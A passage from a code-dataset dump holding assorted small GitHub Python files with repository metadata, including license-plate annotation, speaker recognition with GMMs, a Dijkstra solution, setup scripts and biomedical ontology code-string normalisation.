time\nimport os\n\n\ndef load_model_(path):\n try:\n path = splitext(path)[0]\n with open('%s.json' % path, 'r') as json_file:\n model_json = json_file.read()\n model = model_from_json(model_json, custom_objects={})\n model.load_weights('%s.h5' % path)\n print(\"Loading model successfully...\")\n return model\n except Exception as e:\n print(e)\n\ndef get_plate(image_path, Dmax=608, Dmin=256,lp_threshold=0.5):\n vehicle = preprocess_image(image_path)\n ratio = float(max(vehicle.shape[:2])) / min(vehicle.shape[:2])\n side = int(ratio * Dmin)\n bound_dim = min(side, Dmax)\n _ , LpImg, _, cor = detect_lp(wpod_net, vehicle, bound_dim, lp_threshold)\n return LpImg, cor\n\ndef preprocess_image(image_path,resize=False):\n img = cv2.imread(image_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = img / 255\n if resize:\n img = cv2.resize(img, (224,224))\n return img\n\ndef draw_box(image_path, cor, thickness=3): \n vehicle_image = cv2.imread(image_path)\n vehicle_image = cv2.cvtColor(vehicle_image, cv2.COLOR_BGR2RGB)\n\n for k in range(len(cor)):\n pts=[] \n x_coordinates=cor[k][0]\n y_coordinates=cor[k][1]\n # store the top-left, top-right, bottom-left, bottom-right \n # of the plate license respectively\n for i in range(4):\n pts.append([int(x_coordinates[i]),int(y_coordinates[i])])\n \n pts = np.array(pts, np.int32)\n pts = pts.reshape((-1,1,2))\n print(pts)\n # vehicle_image = preprocess_image(image_path)\n \n cv2.polylines(vehicle_image,[pts],True,(0,255,0),thickness)\n return vehicle_image\n\nif __name__ == \"__main__\":\n wpod_net_path = \"pyscripts/wpod-net.json\"\n wpod_net = load_model_(wpod_net_path)\n print(wpod_net.summary())\n\n\n # Create a list of image paths \n image_paths = glob.glob(\"train_data/self_taken/*\")\n print(\"Found %i images...\"%(len(image_paths)))\n base_save_dir=\"./train_data/processed\"\n os.makedirs(base_save_dir,exist_ok=True)\n\n for test_image in image_paths:\n # Obtain plate image and its coordinates from an image\n print(\"-\"*40)\n print(test_image)\n image = cv2.imread(test_image)\n try:\n LpImg,cor = get_plate(test_image,lp_threshold=0.5)\n except Exception as e:\n print(e)\n continue\n labeled_image=draw_box(test_image,cor)\n x_coordinates=cor[0][0]\n y_coordinates=cor[0][1]\n print(\"Detect %i plate(s) in\"%len(LpImg),splitext(basename(test_image))[0])\n print(\"x Coordinate:\",x_coordinates)\n print(\"y Coordinate:\",y_coordinates)\n base_name=splitext(basename(test_image))[0]\n ext=test_image.split(\".\")[-1]\n\n #save\n print(os.path.join(base_save_dir,base_name+\".\"+ext))\n cv2.imwrite(os.path.join(base_save_dir,base_name+\".\"+ext),image)\n cv2.imwrite(os.path.join(base_save_dir,base_name+\"_detect.\"+ext),labeled_image[:,:,::-1])\n \n # save y (coordinate 1st row x , 2nd row y) as txt\n path_w = os.path.join(base_save_dir,base_name+\".txt\")\n with open(path_w, mode='w') as f:\n f.write(','.join(x_coordinates.astype(np.int).astype(str).tolist()))\n f.write('\\n')\n f.write(','.join(y_coordinates.astype(np.int).astype(str).tolist()))\n # Visualize our result\n # plt.figure(figsize=(12,5))\n # plt.subplot(1,2,1)\n # plt.axis(False)\n # plt.imshow(preprocess_image(test_image))\n # plt.subplot(1,2,2)\n # plt.axis(False)\n # plt.imshow(LpImg[0])\n\n # plt.figure(figsize=(8,8))\n # plt.axis(False)\n # plt.imshow(draw_box(test_image,cor))\n\n # plt.show()\n # plt.close()\n","repo_name":"MassSkt/js-licence-plate-recognition","sub_path":"pyscripts/annotate_with_wpodnet.py","file_name":"annotate_with_wpodnet.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29805017388","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='whatsappy',\n version='1.1.0',\n description='Run Whatsapp in Selenium for programmatic access',\n url='https://github.com/DomiDre/whatsappy',\n author='Dominique Dresen',\n author_email='dominiquedresen@gmail.com',\n license=\"MIT License\",\n long_description=readme,\n long_description_content_type='text/markdown',\n install_requires=['selenium'],\n python_requires='>2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*',\n platforms=['Linux'],\n package_dir={'whatsappy': 'whatsappy'},\n packages=find_packages(\n exclude=(\n '_build',\n 'docs',\n '_static',\n '_templates'\n 'tests',\n 'examples'\n )\n ),\n keywords='whatsapp selenium'\n)","repo_name":"DomiDre/whatsappy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31770753722","text":"def manacher(s):\n assert '$' not in s and '^' not in s and '#' not in s\n if s == \"\":\n return (0, 1)\n t = '^#' + '#'.join(s) +'#$'\n\n c = 0\n d = 0\n p = [0] * len(t)\n print(t)\n for i in range(1, len(t)-1):\n # 相对于中心c翻转i\n mirror = 2*c-i\n print(i, c, d)\n # 增加以i为中心的回文字串长度\n p[i] = max(0, min(d-i, p[mirror]))\n\n while t[i+1+p[i]] == t[i-1-p[i]]:\n p[i] += 1\n print(p[i])\n if i + p[i] > d:\n c = i\n d = i + p[i]\n print(p)\n (k, i) = max((p[i], i) for i in range(1, len(t)-1))\n print((k, i))\n return ((i - k)//2, (i+k)//2)\n\n\nprint(manacher(\"aaabaa\"))\n\nprint(manacher(\"abcdedcbcded\"))\n","repo_name":"NeilWangziyu/HighPerformancwAlgorithm","sub_path":"Manacher.py","file_name":"Manacher.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3321407954","text":"import numpy as np\ntry:\n import _pickle as pickle #Python3 support\nexcept:\n import cPickle as pickle#Python2 support\n \ntry:\n from speaker import GMMSet, GMM #Gpu Support\n pass\nexcept:\n print(\"pycaspgmm\")\n import operator\n import numpy as np\n from sklearn.mixture import GaussianMixture as GMM\n class GMMSet(object):\n\n def __init__(self, gmm_order = 32):\n self.gmms = []\n self.gmm_order = gmm_order\n self.y = []\n\n def fit_new(self, x, label):\n self.y.append(label)\n gmm = GMM()\n gmm.fit(x)\n self.gmms.append(gmm)\n \n def fit_multi_instances_same_class(self, x, label):\n \n if label in self.y:\n idx = self.y.index(label)\n gmm = self.gmms[idx]\n gmm.fit(x)\n else: \n self.y.append(label)\n gmm = GMM(n_components=13)\n gmm.fit(x)\n self.gmms.append(gmm)\n def gmm_score(self, gmm, x):\n return np.sum(gmm.score(x))\n\n def predict_one(self, x):\n scores = [self.gmm_score(gmm, x) / len(x) for gmm in self.gmms]\n p = sorted(enumerate(scores), key=operator.itemgetter(1), reverse=True)\n result = [(self.y[index], value) for (index, value) in enumerate(scores)]\n p = max(result, key=operator.itemgetter(1))\n return p\n \n \n\n\n\n\n \nclass GMMRec(object):\n\n def __init__(self):\n self.features = []\n self.gmmset = GMMSet()\n self.classes = []\n \n def enroll(self, name, mfcc_vecs):\n mu = np.mean(mfcc_vecs, axis = 0)\n sigma = np.std(mfcc_vecs, axis = 0)\n feature = (mfcc_vecs - mu) / sigma\n feature = feature.astype(np.float32)\n self.features.append(feature)\n self.classes.append(name)\n\n def _get_gmm_set(self):\n return GMMSet()\n\n def train(self):\n self.gmmset = self._get_gmm_set()\n for name, feats in zip(self.classes, self.features):\n self.gmmset.fit_new(feats, name)\n \n def predict(self, mfcc_vecs):\n mu = np.mean(mfcc_vecs, axis = 0)\n sigma = np.std(mfcc_vecs, axis = 0)\n feature = (mfcc_vecs - mu) / sigma\n feature = feature.astype(np.float32)\n return self.gmmset.predict_one(feature)\n \n def dump(self, fname, part = None):\n try:\n with open(fname, 'wb') as f:\n if part is None:\n pickle.dump(self, f, -1)\n else:\n pickle.dump(part, f, -1)\n except:\n with open(fname, 'w') as f:\n if part is None:\n pickle.dump(self, f, -1)\n else:\n pickle.dump(part, f, -1)\n\n @staticmethod\n def load(fname):\n try:\n \n with open(fname, 'rb') as f:\n R = pickle.load(f)\n return R\n except:\n with open(fname, 'r') as f:\n R = pickle.load(f)\n return R\n\n \n","repo_name":"Edresson/Speech2Phone","sub_path":"Paper/Speech2Phone-Experiments/speaker/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"44094814043","text":"import numpy as np\n\n# Define the weights for each characteristic\nunifier_weight = 1.0\nintegrity_weight = 1.5 # Weighs more than other characteristics\naccountability_weight = 1.0\n# ... Add more weights for other characteristics\n\n# Define the scores for each party on each characteristic\nND_unifier_score = 60\nND_integrity_score = 70\nND_accountability_score = 50\n# ... Add more scores for other characteristics\n\nSYRIZA_unifier_score = 50\nSYRIZA_integrity_score = 60\nSYRIZA_accountability_score = 40\n# ... Add more scores for other characteristics\n\n# ... Repeat for other parties\n\n# Calculate the reputation scores by multiplying each characteristic score by its weight and summing up\nND_reputation = unifier_weight * ND_unifier_score + integrity_weight * ND_integrity_score + accountability_weight * ND_accountability_score # + ...\nSYRIZA_reputation = unifier_weight * SYRIZA_unifier_score + integrity_weight * SYRIZA_integrity_score + accountability_weight * SYRIZA_accountability_score # + ...\n# ... Repeat for other parties\n\n# Calculate the total reputation scores for all parties\ntotal_reputation = ND_reputation + SYRIZA_reputation # + ...\n\n# Define the poll results\npoll_results = {\n 'ND': 35.0,\n 'SYRIZA': 30.0,\n 'Undecided': 10.0\n}\n\n# Calculate the final results\nfinal_results = {}\nfor party, result in poll_results.items():\n if party == 'Undecided':\n continue\n reputation = ND_reputation if party == 'ND' else SYRIZA_reputation # update this line to fetch the correct reputation for each party\n final_results[party] = result + poll_results['Undecided'] * (reputation / total_reputation) + np.random.normal(0, 1)\n\n# Print the final results\nfor party, result in final_results.items():\n print(f\"{party}: {result}%\")\n","repo_name":"GGeronik/Elections","sub_path":"Undecided Voters.py","file_name":"Undecided Voters.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86745888344","text":"import json\nfrom datetime import datetime\nfrom typing import List\n\nfrom janis_assistant.data.dbproviderbase import DbProviderBase\nfrom janis_assistant.data.models.outputs import WorkflowOutputModel\nfrom janis_assistant.utils.dateutils import DateUtil\n\n\nclass OutputDbProvider(DbProviderBase[WorkflowOutputModel]):\n CURRENT_SCHEMA_VERSION = 1\n\n def __init__(self, db, readonly, submission_id):\n super().__init__(\n base_type=WorkflowOutputModel,\n db=db,\n readonly=readonly,\n tablename=\"outputs\",\n scopes={\"submission_id\": submission_id},\n )\n self.submission_id = submission_id\n\n def insert_many(self, outputs: List[WorkflowOutputModel]):\n return self.insert_or_update_many(outputs)\n\n def update_paths(\n self, run_id: str, tag: str, original_path: str, new_path: str, value: any\n ):\n model = WorkflowOutputModel(\n id_=tag,\n submission_id=self.submission_id,\n run_id=run_id,\n original_path=original_path,\n new_path=new_path,\n timestamp=datetime.now(),\n value=value,\n # empty fields\n extension=None,\n is_copyable=None,\n output_folder=None,\n output_name=None,\n secondaries=None,\n )\n self.insert_or_update_many([model])\n\n def upgrade_schema(self, from_version: int):\n # if from_version < 2:\n # self.migrate_to_2()\n return\n","repo_name":"PMCC-BioinformaticsCore/janis-assistant","sub_path":"janis_assistant/data/providers/outputdbprovider.py","file_name":"outputdbprovider.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"72610800373","text":"from infoPermanente import Persona\nclass ListaPersonas:\n\tpersonas=[]\n\tdef __init__(self):\n\t\tlistaDePersonas=open(\"ficheroExterno\",\"ab+\");\n\t\tlistaDePersonas.seek(0);\n\t\ttry:\n\t\t\tself.personas=pickle.load(listaDePersonas);\n\t\t\tprint(\"se cargaron {} personas del fichero externo\".format(len(self.personas)));\n\t\texcept:\n\t\t\tprint(\"el fichero esta vacio\");\n\t\tfinally:\n\t\t\tlistaDePersonas.close();\n\t\t\tdel(listaDePersonas);\n\n\tdef agregarPersonas(self,persona):\n\t\tself.personas.append(persona);\n\n\tdef mostrarPersonas(self):\n\t\tfor i in self.personas:\n\t\t\tprint(i);\n\n\tdef guardarPersonasEnFicheroExterno(self):\n\t\tlistaDePersonas=open(\"ficheroExterno\",\"wb\");\n\t\tpickle.dump(self.personas,listaDePersonas);\n\t\tlistaDePersonas.close();\n\t\tdel(listaDePersonas);\n\n\tdef mostarInfoFicheroExterno(self):\n\t\tprint(\"la informacion del fichero es la siguiente \");\n\n\t\tfor p in self.personas:\n\t\t\tprint(p)\n\n\n\nmilista=ListaPersonas()\nmipersona1=Persona(\"Sandra Lopez\",\"Femenino\",40)\nmilista.agregarPersonas(mipersona1)\nmipersona2=Persona(\"Jose Valencia\",\"Masculino\",80)\nmilista.agregarPersonas(mipersona2)\nmilista.mostarInfoFicheroExterno()","repo_name":"jart2222/ArchivoPermanente","sub_path":"ListaPersonas.py","file_name":"ListaPersonas.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75197582773","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\nN, M, C = map(int, input().split())\n\ngraph = [[] for _ in range(N + 1)]\ndistance = [INF] * (N + 1)\n\nfor _ in range(M):\n X, Y, Z = map(int, input().split())\n graph[X].append((Y, Z))\n\ndef dijkstra_pq(start):\n q = []\n heapq.heappush(q, (0, start))\n distance[start] = 0\n\n while q:\n acc, cur = heapq.heappop(q)\n\n if distance[cur] < acc:\n continue\n\n for adj, d in graph[cur]:\n cost = acc + d\n if cost < distance[adj]:\n distance[adj] = cost\n heapq.heappush(q, (cost, adj))\n\n return distance\n\nlist = dijkstra_pq(C)\n\ncnt = 0\ntime = 0\nfor i in range(1, len(list)):\n if 0 < list[i] < INF:\n cnt += 1\n time = max(time, list[i])\n\nprint(cnt, time)\n\n","repo_name":"keeeeeey/baekjoon_algorithm","sub_path":"1. 이코테/chapter 09 (최단 경로)/전보2.py","file_name":"전보2.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21840543577","text":"import time, sqlite3, json, requests\r\nimport datetime\r\nimport random\r\nfrom random_word import RandomWords\r\nimport numpy as np\r\n\r\nnumdays = 24 * 40\r\nNbrCapteur = 8\r\nNbrTypes = 5\r\nNbrStation = 6\r\n\r\nr = RandomWords()\r\n\r\nconn = sqlite3.connect('capteur.db')\r\nc = conn.cursor()\r\nbase = datetime.datetime.today()\r\ndate_list = np.arange(datetime.datetime(2022, 1, 1, 0, 0), datetime.datetime(2023, 12, 12, 23, 0),\r\n datetime.timedelta(hours=1)).astype(datetime.datetime)\r\nc.execute(\"delete from SensorReading;\")\r\nc.execute(\"delete from Sensor;\")\r\nc.execute(\"delete from Station;\")\r\nc.execute(\"delete from SensorTypes;\")\r\nc.execute(\"delete from sqlite_sequence;\");\r\nconn.commit()\r\n\r\nfor i in range(0, NbrTypes):\r\n c.execute(\"insert into SensorTypes (Unit) values (\\\"NbrTypes_%s\\\");\" % (r.get_random_word()))\r\n\r\nfor i in range(0, NbrStation):\r\n c.execute(\"insert into Station (Name) values (\\\"Station_%s\\\");\" % (r.get_random_word()))\r\n\r\nfor i in range(0, NbrCapteur):\r\n mac = \"BC:FF:4D:4\" + str(i) + \":BD:DC\"\r\n query = \"insert into Sensor (Type,DateAdded,Station,Name,MacAdress) values (%s,\\\"%s\\\",%s,\\\"Sensor_%s\\\",\\\"%s\\\");\" % (\r\n random.randint(1, NbrTypes), str(date_list[i]), random.randint(1, NbrStation), r.get_random_word(), str(mac))\r\n c.execute(query)\r\n\r\nz = 0\r\nfor capteur in range(0, 9):\r\n z = random.randint(-10, 10)\r\n for i in range(0, numdays):\r\n c.execute(\"INSERT INTO SensorReading (SensorId,DateAdded,Value) VALUES (%s, \\\"%s\\\",\\\"%s\\\");\" % (\r\n str(capteur + 1), str(date_list[i]), str(z)))\r\n if random.randint(0, 1) == 1:\r\n z += random.randint(0, 10)\r\n else:\r\n z -= random.randint(0, 10)\r\n\r\nconn.commit()\r\n\r\nprint(\"Table SensorTypes:\")\r\nc.execute(\"select * from SensorTypes;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n\r\nprint(\"\\nTable Station:\")\r\nc.execute(\"select * from Station;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n\r\nprint(\"\\nTable Sensor:\")\r\nc.execute(\"select * from Sensor;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n\r\nprint(\"\\nTable SensorReading:\")\r\nc.execute(\"select * from SensorReading;\")\r\nres = c.fetchall()\r\nprint(*res, sep=\"\\n\")\r\n","repo_name":"JardinsBruyere/Serveur","sub_path":"mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43293479091","text":"import os\nimport pandas as pd\nfrom astroquery.ipac.nexsci.nasa_exoplanet_archive import (\n NasaExoplanetArchive, conf\n)\nfrom tqdm.auto import tqdm\nfrom astropy.utils.data import download_file\nfrom zipfile import ZipFile\n\nconf.cache = True\n\nurls = [\n ('https://docs.google.com/spreadsheets/d/'\n '11Z7B76FXBkEwcGmhp72sC6AQdP8ER8K_eU5RAW8ed2M'\n '/gviz/tq?tqx=out:csv&sheet=owls'),\n ('https://docs.google.com/spreadsheets/d/'\n '11Z7B76FXBkEwcGmhp72sC6AQdP8ER8K_eU5RAW8ed2M'\n '/gviz/tq?tqx=out:csv&sheet=sindices')\n]\n\ndf_owls = pd.read_csv(urls[0])\ndf_sinds = pd.read_csv(urls[1])\n\nfigshare_url = \"https://figshare.com/ndownloader/articles/20480538/versions/3\"\nfigshare_path_tmp = download_file(figshare_url, cache=False)\nfigshare_path = 'docs/owls/targets/figshare_pngs'\n\nwith ZipFile(figshare_path_tmp, 'r') as zip_ref:\n zip_ref.extractall(figshare_path)\n\npage = dict()\n\ntargets_page = f\"\"\"Targets\n=======\n\n.. toctree::\n\n\"\"\"\n\nparams_to_write_out = [\n 'st_teff', 'st_spectype', 'st_rad', 'st_mass', 'st_rotp',\n 'sy_bmag', 'sy_vmag', 'sy_gaiamag'\n]\n\naladin_lite = \"\"\"\n\n \n\n\n \n\n
\n\n\"\"\"\n\nembed_image = \"\"\".. image:: {0}\n :width: 650\n :alt: {1}\"\"\"\n\nquery_aliases = False\n\n# Build individual webpages, one per target\n\npbar = tqdm(df_sinds.groupby('Target'))\n\nfor name, group in pbar:\n pbar.set_description(name)\n\n page[name] = group\n\n likely_planet_host = all([not name.startswith(key)\n for key in ['HD', 'GJ']])\n if likely_planet_host:\n if query_aliases:\n aliases = NasaExoplanetArchive.query_aliases(\n f\"{name.replace('.01', '')}\", cache=True\n )\n nea = NasaExoplanetArchive.query_object(\n f\"{name.replace('.01', '')} b\" if not name.strip().endswith('A')\n else f\"{name[:-1]} b\",\n table=\"pscomppars\", cache=True, regularize=False\n )\n if len(nea) > 0:\n nea_formatted = nea[params_to_write_out].to_pandas().transpose()\n nea_formatted.columns = [name]\n\n else:\n nea = []\n\n with open(f'docs/owls/targets/{name.replace(\" \", \"\")}.rst', 'w') as f:\n f.write(name.replace('.01', '') + '\\n' + len(name.replace('.01', '')) * '=' + '\\n\\n')\n f.write(\"`Search exo.mast `_\\n\\n\")\n f.write(\"`Search SIMBAD `_\\n\\n\")\n\n f.write(\".. raw:: html\\n\\n\")\n f.write(' ' + '\\n '.join(\n group[['Date', 'S', 'err']].to_html(index=False).splitlines()\n ) + '\\n\\n')\n\n if len(nea) > 0:\n nea_header = '`NASA Exoplanet Archive `_ parameters'\n f.write(nea_header + '\\n' + len(nea_header) * '-' + '\\n\\n')\n\n if query_aliases:\n f.write(\"Aliases: \" + ', '.join(aliases) + '\\n\\n')\n\n f.write(\".. raw:: html\\n\\n\")\n f.write(' ' + '\\n '.join(\n nea_formatted.to_html(index=True).splitlines()\n ) + '\\n\\n')\n\n f.write(\".. raw:: html\\n\\n\")\n f.write(' ' + '\\n '.join(\n aladin_lite.format(name.replace('.01', '')).splitlines()\n ) + '\\n\\n')\n\n png_path = f'figshare_pngs/{name.replace(\".01\", \"\").replace(\" \", \"\")}.png'\n\n if os.path.exists(png_path):\n fs_header = 'TESS Light Curve'\n f.write(fs_header + '\\n' + len(fs_header) * '-' + '\\n\\n')\n\n f.write(embed_image.format(png_path, name.replace('.01', '').replace(\" \", \"\")))\n\n if not name.replace(\" \", \"\") in targets_page:\n targets_page += f' targets/{name.replace(\" \", \"\")}.rst\\n'\n\n\n\n# Write out targets.rst page\nwith open(f'docs/owls/targets.rst', 'w') as f:\n f.write(targets_page)\n","repo_name":"bmorris3/owls","sub_path":"build_target_pages.py","file_name":"build_target_pages.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1320857556","text":"\"\"\"\nYou are given two integer arrays nums1 and nums2, sorted in non-decreasing order, and two integers m and n, \nrepresenting the number of elements in nums1 and nums2 respectively.\n\nMerge nums1 and nums2 into a single array sorted in non-decreasing order.\n\nThe final sorted array should not be returned by the function, but instead be stored inside the array nums1. \nTo accommodate this, nums1 has a length of m + n, where the first m elements denote the elements that should be merged, \nand the last n elements are set to 0 and should be ignored. nums2 has a length of n.\n\nExample 1:\n\nInput: nums1 = [1,2,3,0,0,0], m = 3, nums2 = [2,5,6], n = 3\nOutput: [1,2,2,3,5,6]\nExplanation: The arrays we are merging are [1,2,3] and [2,5,6].\nThe result of the merge is [1,2,2,3,5,6] with the underlined elements coming from nums1.\n\"\"\"\n\n# Time complexity: O(n+m)\n# Space complexity: O(1)\n\ndef merge(nums1, m, nums2, n):\n\t# Using 2 pointers for each array\n j = 0\n i = 0\n while i < m + j and j < n:\n if nums2[j] < nums1[i]:\n nums1.insert(i, nums2[j]) # bring a value from nums2\n nums1.pop(-1) # remove one zero\n j += 1\n i += 1\n\n while j < n: # if the second array still has some values then just add them to the first array\n nums1.insert(i, nums2[j])\n nums1.pop(-1)\n i += 1\n j += 1\n\n\nmerge([3,4,5,0,0], 3, [1,2], 2) # expected output: [1,2,3,4,5]\nmerge([1,2,3,0,0,0], 3, [2,5,6], 3) # expected output: [1,2,2,3,5,6]\nmerge([1], 1, [], 0) # expected output: [1]\nmerge([0], 0, [1], 1) # expected output: [1]\nmerge([-1,0,0,3,3,3,0,0,0], 6, [1,2,2], 3) # expected output: [-1,0,0,1,2,2,3,3,3]\n","repo_name":"YaraHorany/Programming-Challenges","sub_path":"MergeSortedArray.py","file_name":"MergeSortedArray.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37128095930","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport argparse as ap\nimport matplotlib.cm as cm\n\ncmap=cm.get_cmap('inferno')\n\nparser=ap.ArgumentParser()\nparser.add_argument('-nrep',type=int,default=0)\nparser.add_argument('-o',type=str,default='plot.png')\nparser.add_argument('-figsize',type=float,nargs=2,default=[9,6])\nargs=parser.parse_args()\n\nfig,ax=plt.subplots(1,1,figsize=args.figsize)\nfor i in range(args.nrep):\n with open('p{:d}.dat'.format(i)) as f:\n ln=f.readline()\n tok=ln.split()\n T=float(tok[3])\n xl,xr,h=np.loadtxt('p{:d}.dat'.format(i),unpack=True)\n ax.plot(0.5*(xl+xr),h,color=cmap(i/args.nrep),label='T = {:.3f}'.format(T))\nax.set_xlabel('$x$')\nax.set_ylabel('$H_i(x)$')\nax.legend()\nplt.savefig(args.o,bbox_inches='tight')\n\nt,x,a=np.loadtxt(\"rep0.log\",unpack=True,)\nfig,ax=plt.subplots(1,1,figsize=args.figsize)\nax.plot(t,x)\nplt.savefig('trace.png')","repo_name":"Abrams-Teaching/instructional-codes","sub_path":"originals/plot-re.py","file_name":"plot-re.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22444642256","text":"# Adapted 'produceOtherDataStructure.py' to save the image paths to a file.\n# The file is a set of subjects, ach subject is a list of:\n# 1. subject name 'name' which is a string;\n# 2. list subject slices 'slices', which is a list of:\n# i. 'img1'\n# ii. 'img2'\n# iii. 'structure'\n# iv. 'lesion' if it is a patient\n# v. info if it is a patient 'is_patient' which is boolean\n# 3. subject info if it is a patient 'is_patient' which is boolean\n\nimport os # to read the folder structure\n# import shutil # to copy a file\n# import warnings # to throw a warning\nimport json # working with files\n\ndata_name = 'data_final'\nprint('saving the data paths to data_mialab/'+data_name+'.txt')\n\n# specify the path of your current data that you want to read\n############################################ change here\nreadPath = 'data_mialab/testOnsite_public'\n\nslices = []\n\n# loop over each file in path recursively\nfor r, d, f in os.walk(readPath): # r = root = current parent folder, d = current directorys (empty if there are no subdirectories in the current parent folder), f = current files (empty if there are no files in the current parent folder, e.g. if the parent folder is empty or if there are only subdirectories)\n\n structureArray = r.split(os.path.sep)\n\n # saving all image paths in their corresponding slices\n if 'img1.nii.gz' in f and 'img2.nii.gz' in f:\n sli = {'img1': os.path.join(r, \"img1.nii.gz\"),\n 'img2': os.path.join(r, \"img2.nii.gz\")}\n\n # saving the subject name\n for infoPart in structureArray:\n if 'subject' in infoPart:\n sli['subject'] = infoPart\n break\n\n # saving the slice name since some subjects have many slices with same slice name\n sli['slice'] = r\n\n slices.append(sli)\n\n else:\n for file in f:\n if '.nii.gz' in file:\n print('Found nii-file outside of slice: ', file)\n\n# saving the subject names\nsubjects = []\nsubject_names = set()\nfor sli in slices:\n subject_names.add(sli['subject'])\n\n# saving the subject name in subjects\nfor s in subject_names:\n subjects.append({'name': s, 'slices': []})\n\n# saving the slices in subjects\nfor sub in subjects:\n for sli in slices:\n if sli['subject'] == sub['name']:\n sub['slices'].append(sli)\n\n# save the slice paths in a file\njson.dump(slices, open('data_mialab/'+data_name+'.txt', 'w')) # subject-wise\n\nprint('done!')\n","repo_name":"madincode/MIAL","sub_path":"produceDataPathOnlineTest.py","file_name":"produceDataPathOnlineTest.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19641678221","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='arlulacore',\n version='2.0.3',\n author=\"Arlula\",\n author_email=\"tech@arlula.com\",\n description=\"A package to facilitate access to the Arlula Imagery Marketplace API\",\n\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Arlula/python-core-sdk.git\",\n packages=[\"arlulacore\"],\n install_requires=['requests'],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"markmnl/python-core-sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"35390307518","text":"#!/usr/bin/env python\n# coding: utf-8\nimport numpy as np\n\n\n# UBKG utilities for parsing\n\n# codeReplacements - shared by at least the following scripts:\n# OWLNETS-UMLS-GRAPH\n# skowlnets\n\ndef codeReplacements(x, ingestSAB: str):\n # JAS 15 Nov 2022 - Refactor\n\n # This function converts strings that correspond to either codes or CUIs for concepts to a format\n # recognized by the knowledge graph.\n #\n # For most concepts this format is:\n # \n # There are a number of special cases, which are handled below.\n\n # The argument x is a Pandas Series object containing information on either:\n # a node (subject or object)\n # a dbxref\n\n # 1. Account for special cases of\n # a. MONDO\n # b. EDAM\n # c. JAS 13 JAN 2023 - UNIPROT\n # 2. Consolidate some string handling.\n # 3. Break up the original string replacement for ease of debugging.\n\n \n # Keep underscores for these SABs and there Codes. -Ben \n # Removed the \".str.replace('_', ' ')\" snippet from the line below this and put it under this if statement\n if OWL_SAB not in ['GTEX_COEXP','LINCS','MSIGDB','CMAP','CLINVAR','HUBMAPSC','SCHEART_PMID_31835037','HGNC_HPO',\n 'HPO_MP','HCOP','MP','HCOP_MP','HGNC_ANNOS','GTEX_EXP','GTEX_EQTL','KF']:\n ret = x.str.replace('_', ' ')\n \n \n # Convert the code string to the CodeID format.\n # This is sufficient for all cases except EDAM, for which underscores will be restored.\n ret = x.str.replace(':', ' ').str.replace('#', ' ').str.split('/').str[-1]\n\n # Convert SABs to expected values.\n # NCI\n ret = ret.str.replace('NCIT ', 'NCI ', regex=False)\n\n # MSH\n ret = ret.str.replace('MESH ', 'MSH ', regex=False)\n # GO\n ret = ret.str.replace('GO ', 'GO GO:', regex=False)\n # NCBI\n ret = ret.str.replace('NCBITaxon ', 'NCBI ', regex=False)\n # UMLS\n ret = ret.str.replace('.*UMLS.*\\s', 'UMLS ', regex=True)\n # SNOMED\n ret = ret.str.replace('.*SNOMED.*\\s', 'SNOMEDCT_US ', regex=True)\n # HP\n ret = ret.str.replace('HP ', 'HPO HP:', regex=False)\n # FMA\n ret = ret.str.replace('^fma', 'FMA ', regex=True)\n # HGNC\n ret = ret.str.replace('Hugo.owl HGNC ', 'HGNC ', regex=False)\n ret = ret.str.replace('HGNC ', 'HGNC HGNC:', regex=False)\n ret = ret.str.replace('gene symbol report?hgnc id=', 'HGNC HGNC:', regex=False)\n\n # Special case:\n # MONDO identifies genes with IRIs in format\n # 